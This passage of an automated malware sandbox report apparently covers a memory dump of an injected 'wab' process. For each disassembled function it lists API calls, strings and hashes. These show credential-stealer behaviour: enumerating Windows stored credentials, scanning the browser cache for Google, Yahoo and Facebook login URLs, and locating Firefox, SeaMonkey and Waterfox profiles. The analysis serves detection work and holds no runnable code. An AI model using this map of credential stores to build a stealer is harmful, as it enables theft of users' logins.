                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                • String ID: r!A
                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                • API String ID: 62308376-4196376884
                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3191383707-0
                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                • API String ID: 3527940856-2068335096
                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                • API String ID: 3527940856-3369679110
                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                • String ID: $0.@
                                                                                                                • API String ID: 3030842498-1896041820
                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2941347001-0
                                                                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                • API String ID: 3249829328-1174173950
                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 669240632-0
                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2911713577-0
                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
